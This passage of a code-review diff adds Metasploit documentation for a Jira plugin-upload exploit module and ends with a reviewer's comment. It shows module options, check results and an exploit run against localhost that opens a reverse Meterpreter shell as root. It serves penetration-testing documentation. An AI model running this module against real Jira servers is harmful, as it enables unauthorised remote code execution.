documentation/modules/exploit/multi/http/jira_plugin_upload.md

```diff
@@ -0,0 +1,211 @@
+   RHOST         127.0.0.1        yes       The target address
+   RPORT         2990             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /jira/           yes       The base URI to Jira
+   VHOST                          no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf exploit(multi/http/jira_plugin_upload) > check
+
+[*] Server accepted the credentials, user has access to plugin manager!
+[*] 127.0.0.1:2990 The target appears to be vulnerable.
+msf exploit(multi/http/jira_plugin_upload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Retrieving Session ID and XSRF token...
+[*] Attempting to upload UlDRthpT
+[*] Successfully uploaded UlDRthpT
+[*] Executing UlDRthpT
+[*] Deleting UlDRthpT
+[*] Sending stage (53837 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:43208) at 2018-02-25 13:45:43 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
+[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died
+msf exploit(multi/http/jira_plugin_upload) > 
+```
+Running check module with bad credentials:
+```msf exploit(multi/http/jira_plugin_upload) > show options
+
+Module options (exploit/multi/http/jira_plugin_upload):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  admin            yes       The password for the specified username
+   HttpUsername  password         yes       The username to authenticate as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST         127.0.0.1        yes       The target address
+   RPORT         2990             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /jira/           yes       The base URI to Jira
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  127.0.0.1        yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf exploit(multi/http/jira_plugin_upload) > check
+
+[-] Server rejected the credentials or the user doesn't have access to plugin manager!
+[*] 127.0.0.1:2990 Cannot reliably check exploitability.
+msf exploit(multi/http/jira_plugin_upload) > 
+```
+Attempting to exploit with bad credentials:
```

Comment:
I think you can remove this section since you've already showed it working and a bad chrck